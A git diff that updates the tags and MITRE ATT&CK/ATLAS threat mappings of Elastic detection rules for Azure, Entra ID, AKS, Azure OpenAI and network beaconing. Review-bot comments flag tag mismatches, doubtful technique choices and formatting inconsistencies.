@@ -67,7 +67,7 @@ references = ["https://docs.microsoft.com/en-us/azure/event-hubs/authorize-acces risk_score = 47 rule_id = "b6dce542-2b75-4ffb-b7d6-38787298ba9d" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Log Auditing", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -78,36 +78,30 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" [[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" +id = "T1552.005" +name = "Cloud Instance Metadata API" +reference = "https://attack.mitre.org/techniques/T1552/005/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + 
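Review bot: The new `tags` in hunk @@ -67 keep only `"Tactic: Persistence"`, yet hunk @@ -78 on the same file adds a second `[[rule.threat]]` entry with `TA0006` / `Credential Access`, so the tags no longer cover every mapped tactic; add `"Tactic: Credential Access",` or drop the entry. The replacement technique also deserves a second look: `T1552.005` Cloud Instance Metadata API describes reading credentials from an instance metadata endpoint, whereas this rule keys on an Event Hub operation in `azure.activitylogs.operation_name` (visible in the hunk header), so the sub-technique looks like a mismatch for what the query detects — the removed `T1098.001` Additional Cloud Credentials was the closer fit if the concern is newly persisted access keys. Please confirm the mapping against the rule's query, which lies outside this hunk.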
diff --git a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml index aab5a627660..fa59f5be650 100644 --- a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml +++ b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/14" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -52,7 +52,16 @@ references = ["https://dirkjanm.io/persisting-with-federated-credentials-entra-a risk_score = 47 rule_id = "42c97e6e-60c3-11f0-832a-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "new_terms" 
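Review bot: In the rebuilt `tags` list of hunk @@ -52, `"Tactic: Persistence"` is placed after `"Resources: Investigation Guide"`, whereas the other tags lists in this patch (e.g. the Azure RBAC and Entra ID privilege-escalation rules) put the Tactic tags before `Resources: Investigation Guide`. Moving `"Tactic: Persistence",` to sit immediately before `"Resources: Investigation Guide",` keeps the ordering consistent across rules and makes the tactic easy to spot when scanning tags.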
@@ -66,29 +75,22 @@ event.dataset: azure.graphactivitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.graphactivitylogs.properties.user_principal_object_id"] diff --git a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml index 3b789ded337..af9bc41d8c9 100644 --- a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml +++ b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -81,7 +81,6 @@ sequence with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" 
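Review bot: The sub-technique added in hunk @@ -66, `T1556.009` Conditional Access Policies, does not obviously describe what this rule detects: the filename (`persistence_graph_eam_addition_or_modification`) and the federated-credentials reference visible in the hunk header point at changes to authentication methods rather than to conditional access policies. If the query matches external authentication method registration or modification, `T1556.006` Multi-Factor Authentication is the closer ATT&CK sub-technique; please confirm against the query, which is outside this hunk. Dropping the Defense Evasion `[[rule.threat]]` entry is consistent with the tags hunk on this file, which keeps only `"Tactic: Persistence"`.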
@@ -92,6 +91,16 @@ id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml index bfe260a8cfb..de9b0f23509 100644 --- a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml +++ b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/15" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/15" [rule] author = ["Elastic"] @@ -65,7 +65,14 @@ references = [ risk_score = 73 rule_id = "1a1046f4-9257-11f0-9a42-f661ea17fbce" severity = "high" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Azure Activity Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" 
@@ -86,34 +93,16 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml index cff07282bae..0f07d5c9080 100644 --- a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml +++ b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/22" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic", "Austin Songer"] 
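Review bot: Collapsing the two `[[rule.threat]]` entries into one in this hunk leaves `T1098.003` mapped only to `TA0004` Privilege Escalation, while the removed entry showed it was also mapped to `TA0003` Persistence — a tactic ATT&CK lists for Account Manipulation and one that a rule about administrator role assignment plausibly covers. If the goal was only to stop listing the same technique twice, keep a second `[[rule.threat]]` with the `TA0003` tactic (and `"Tactic: Persistence"` in tags) rather than dropping the tactic; if dropping Persistence is intended, the hunk is consistent with the tags change above it. The same question applies to hunk @@ -81 of privilege_escalation_entra_id_elevate_to_user_administrator_access.toml, which makes the identical removal.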
@@ -66,7 +66,16 @@ references = [ risk_score = 73 rule_id = "8d9c4128-372a-11f0-9d8f-f661ea17fbcd" severity = "high" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -81,39 +90,22 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] 
diff --git a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml index 45a2e0961ab..eae2f416a42 100644 --- a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml +++ b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Austin Songer"] @@ -62,7 +62,13 @@ references = [ risk_score = 21 rule_id = "1c966416-60c1-436b-bfd0-e002fddbfd89" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" 
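Review bot: The rebuilt `tags` list in hunk @@ -62 keeps only `"Tactic: Privilege Escalation"`, but the threat hunk @@ -76 on this same file still ends with a second `[[rule.threat]]` entry mapped to `TA0003` / `Persistence`, so a Tactic tag is missing for a mapped tactic. Add `"Tactic: Persistence",` back to the list, or remove the TA0003 entry if the rule is meant to be Privilege Escalation only.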
@@ -76,36 +82,30 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml b/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml index 0af5fcf3987..d20e1c44577 100644 --- a/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml +++ b/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml 
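Review bot: This hunk removes `T1098.006` Additional Container Cluster Roles from both entries, although a rule that fires on AKS RoleBinding creation appears to be the natural fit for that sub-technique; the replacement under Privilege Escalation, `T1078.004` Cloud Accounts, describes use of a valid cloud account rather than the role grant itself. Unless the narrowing is deliberate, keeping `T1098.006` under the `T1098` technique — at least in the Persistence entry, which now has no sub-technique — preserves the more precise mapping. Swapping the entry order so Privilege Escalation comes first is fine, but the final `+` line adds a trailing blank line at end of file.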
@@ -2,7 +2,7 @@ creation_date = "2026/03/03" integration = ["azure"] maturity = "development" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -86,3 +86,20 @@ event.dataset: azure.auditlogs ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1584" +name = "Compromise Infrastructure" +reference = "https://attack.mitre.org/techniques/T1584/" +[[rule.threat.technique.subtechnique]] +id = "T1584.001" +name = "Domains" +reference = "https://attack.mitre.org/techniques/T1584/001/" + + + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml b/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml index 4934540a281..46cd5e6b95a 100644 --- a/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml +++ b/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/25" integration = ["azure_openai"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -65,7 +65,14 @@ For more information on streaming events, see the Azure OpenAI documentation: https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Impact", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Denial of Service", "Mitre Atlas: T0029", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: Azure OpenAI", + "Data Source: Azure Event Hubs", + "Use Case: Denial of Service", + "Mitre Atlas: T0029", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
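Review bot: The threat mapping added in hunk @@ -86 of resource_development_entra_id_custom_domain_added_and_verified.toml introduces a `TA0042` Resource Development tactic, but that file's `tags` line is not part of this patch, so please make sure it carries `"Tactic: Resource Development"` to match. The choice of `T1584.001` Compromise Infrastructure: Domains is also worth a second look — adding and verifying a domain in a tenant is an actor bringing in a domain they control rather than hijacking an existing one, so `T1583.001` Acquire Infrastructure: Domains may describe it more accurately; confirm against the rule description, which is outside the hunk. Finally, the block has three blank lines between the sub-technique and `[rule.threat.tactic]`; one is enough.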
@@ -91,33 +98,3 @@ from logs-azure_openai.logs-* | sort Esql.event_count desc ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" - -[[rule.threat.technique.subtechnique]] -id = "T1499.003" -name = "Application Exhaustion Flood" -reference = "https://attack.mitre.org/techniques/T1499/003/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0059" -name = "Erode Dataset Integrity" -reference = "https://atlas.mitre.org/techniques/AML.T0059/" - -[rule.threat.tactic] -id = "AML.TA0011" -name = "Impact" -reference = "https://atlas.mitre.org/tactics/AML.TA0011/" diff --git a/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml b/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml index f626db07f8c..80c55337e22 100644 --- a/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml +++ b/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/25" integration = ["azure_openai"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] 
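Review bot: Hunk @@ -91 deletes the rule's entire threat mapping — the ATT&CK `T1499.003` / `TA0040` entry as well as the ATLAS `AML.T0059` / `AML.TA0011` one — leaving azure_openai_denial_of_ml_service_detection.toml with no framework coverage, while the tags hunk above keeps `"Mitre Atlas: T0029"`, so the tags now claim an ATLAS mapping the file no longer declares. The two removed entries share the display name `Impact` but belong to different frameworks, so they were not duplicates of one another; if the removal was driven by a duplicate-tactic concern, keep at least the ATLAS entry (and align its technique ID with the tag, which pointed at `T0029` rather than `AML.T0059`). The same full removal happens in azure_openai_insecure_output_handling_detection.toml and azure_openai_model_theft_detection.toml, the latter also retaining `"Mitre Atlas: T0044"` in its tags.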
@@ -61,7 +61,13 @@ For more information on streaming events, see the Azure OpenAI documentation: https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs """ severity = "low" -tags = ["Domain: LLM", "Tactic: Impact", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Insecure Output Handling", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: Azure OpenAI", + "Data Source: Azure Event Hubs", + "Use Case: Insecure Output Handling", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -86,15 +92,3 @@ from logs-azure_openai.logs-* Esql.event_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0048" -name = "External Harms" -reference = "https://atlas.mitre.org/techniques/AML.T0048/" - -[rule.threat.tactic] -id = "AML.TA0011" -name = "Impact" -reference = "https://atlas.mitre.org/tactics/AML.TA0011/" diff --git a/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml b/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml index 0ed1e394199..d5cb5f71268 100644 --- a/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml +++ b/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/25" integration = ["azure_openai"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] 
@@ -62,7 +62,14 @@ streaming events, see the Azure OpenAI documentation: https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Credential Access", "Tactic: Exfiltration", "Tactic: AI Model Access", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Model Theft", "Mitre Atlas: T0044", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: Azure OpenAI", + "Data Source: Azure Event Hubs", + "Use Case: Model Theft", + "Mitre Atlas: T0044", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
@@ -91,54 +98,3 @@ from logs-azure_openai.logs-* Esql.event_count desc ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0024" -name = "Exfiltration via AI Inference API" -reference = "https://atlas.mitre.org/techniques/AML.T0024/" - -[rule.threat.tactic] -id = "AML.TA0010" -name = "Exfiltration" -reference = "https://atlas.mitre.org/tactics/AML.TA0010/" diff --git a/rules/integrations/beaconing/command_and_control_beaconing.toml b/rules/integrations/beaconing/command_and_control_beaconing.toml index dc81f134f13..f89fe47c8c3 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -95,13 +95,19 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml index 62075e640fe..0fe0d4d7320 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -90,13 +90,19 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + 
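Review bot: Replacing `T1071` Application Layer Protocol with `T1102.002` Web Service: Bidirectional Communication narrows the mapping to C2 over legitimate external web services, yet the description in the hunk header ("Statistical models analyze network traffic patterns to identify anomalies…") describes a generic beaconing detector that is not tied to web services. Unless the model only scores traffic to such services, `T1071` (possibly alongside `T1102.002`) is the more faithful mapping; the same change is made to command_and_control_beaconing_high_confidence.toml in the following hunk. Both files also gain two blank lines before `[rule.threat.tactic]`, no blank between technique and sub-technique, and a trailing blank line at end of file.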
diff --git a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml index 9b376e4d6e1..98c2b0a4e53 100644 --- a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml +++ b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/27" [rule] author = ["Elastic"] @@ -72,9 +72,9 @@ process.interactive == true and container.id like "?*" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml index 1550a8b19f4..5d448150ea9 100644 --- a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml +++ b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] author = ["Elastic"] 
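Review bot: In hunk @@ -72 of command_and_control_curl_socks_proxy_detected_inside_container.toml the technique changes from `T1090` Proxy to `T1572` Protocol Tunneling, but routing curl through a SOCKS proxy is the behaviour `T1090` describes, whereas `T1572` covers encapsulating one protocol inside another. If the rule is meant to flag proxy use, keep `T1090` (or list both techniques under the same `[[rule.threat]]`); the query that decides this is outside the hunk.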
@@ -65,7 +65,15 @@ references = [ risk_score = 47 rule_id = "a8b08d2d-6dfe-453f-87d1-11d5fc3ec746" severity = "medium" -tags = ["Tactic: Command and Control", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -87,12 +95,35 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" + + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" 
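Review bot: Hunk @@ -87 removes `T1105` Ingress Tool Transfer, which is the technique that directly describes what command_and_control_interactive_file_download_from_internet.toml detects — an interactive download of a file from the internet into a container; the replacements `T1071.001` (the protocol used) and `T1059.004` (the shell that ran it) describe context rather than the transfer itself, so `T1105` should probably stay alongside them. The new block is also formatted unlike every other rule in this patch: sub-tables are indented, `[rule.threat.tactic]` precedes `[[rule.threat.technique]]`, and three tables put `name` before `id` while the `T1059` table puts `id` first. TOML resolves these headers to the most recent `[[rule.threat]]` element so the file should parse, but matching the column-0, technique-then-tactic, `id`/`name`/`reference` layout used elsewhere keeps the rules uniform. The query this mapping describes is outside the hunk.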
